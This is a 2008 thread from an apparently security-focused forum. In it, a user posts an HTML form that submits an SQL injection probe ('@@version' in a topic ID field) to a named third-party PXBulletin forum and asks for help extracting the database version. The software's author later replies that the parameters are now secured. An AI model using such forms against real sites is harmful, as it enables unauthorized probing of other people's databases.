 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 456
Members: 0
Total: 456
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL Command Execution Vulnerability ? |
 |
Posted: Fri Jun 20, 2008 2:59 pm |
|
|
kr0k0 |
Advanced user |

 |
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
SQL Command Execution Vulnerability ??
Hi , i need your help waraxe about this source , u can see the exploit in the source HTML , plz see it .
Code: | <html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SQL Command Execution Vulnerability</title>
<link href="templates/style.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.Style1 {font-family: Georgia, "Times New Roman", Times, serif}
.Style2 {
font-family: "Courier New", Courier, monospace;
font-weight: bold;
}
.Style4 {font-family: Georgia, "Times New Roman", Times, serif; font-weight: bold; }
-->
</style>
</head>
<body bgcolor="#CCCCCC">
<div align="center">
<p class="Style2">SQL Command Execution Vulnerability</p>
<p><span class="Style1">Use some Function or Command SQL </span>and clic in the BAR 'run command' <br />
<br />
</p>
</div>
<div class="content">
<form method="post" action="http://forum.prxa.info/newreply.php?reply">
<textarea name="replytext" cols="5" rows="5" class="Style2" style="width: 40%;">Put a simple message .</textarea>
<input type="hidden" name="forumid" value="9">
<br />
<input type="submit" class="Style2" value="Run command">
<input type="text" name="topicid" value="@@version" />
: <span class="Style1">Use some Function or Command SQL Blind ;
</span>
</form></div>
</body>
</html> |
|
|
|
|
|
 |
 |
|
 |
Posted: Fri Jun 20, 2008 7:45 pm |
|
|
pexli |
Valuable expert |

 |
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
 |
 |
 |
|
Safe this form on your PC as .html and open in browser. |
|
|
|
|
Posted: Fri Jun 20, 2008 8:21 pm |
|
|
kr0k0 |
Advanced user |

 |
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
 |
 |
 |
|
koko wrote: | Safe this form on your PC as .html and open in browser. |
yeah i now , it's me who code this , i want to see the page HTML . . . , see it plz , try to put somthing like '@@version' and also put this 'blablabla' , and see what what happens, So i need some injection to view the version , plz look it .  |
|
|
|
|
Posted: Sat Jun 21, 2008 2:25 am |
|
|
pexli |
Valuable expert |

 |
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
 |
 |
 |
|
I understand you search Xploit for PXBulletin ?Last night i look this forum(from xploit) PXBulletin 0.3 and this morning they changed him to PXBulletin 0.4.Guess they patched him. |
|
|
|
|
Posted: Sun Jun 22, 2008 1:56 pm |
|
|
liamdawe |
Beginner |

 |
|
Joined: Jun 22, 2008 |
Posts: 1 |
|
|
|
 |
 |
 |
|
Hi i am the creator of PXBulletin and wish to know about this so called sql injection you can do to the software?
Edit > Since finding this topic i have secured against the topic id, forum id and author id. So this "sql injection" should be fixed, even though you couldn't execute anything since all input was escaped via php.
Also note the software is still in ALPHA stages of development. |
|
|
|
|
Posted: Sun Jun 22, 2008 8:17 pm |
|
|
pexli |
Valuable expert |

 |
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
 |
 |
 |
|
liamdawe wrote: | Hi i am the creator of PXBulletin and wish to know about this so called sql injection you can do to the software?
Edit > Since finding this topic i have secured against the topic id, forum id and author id. So this "sql injection" should be fixed, even though you couldn't execute anything since all input was escaped via php.
Also note the software is still in ALPHA stages of development. |
Good work.  |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|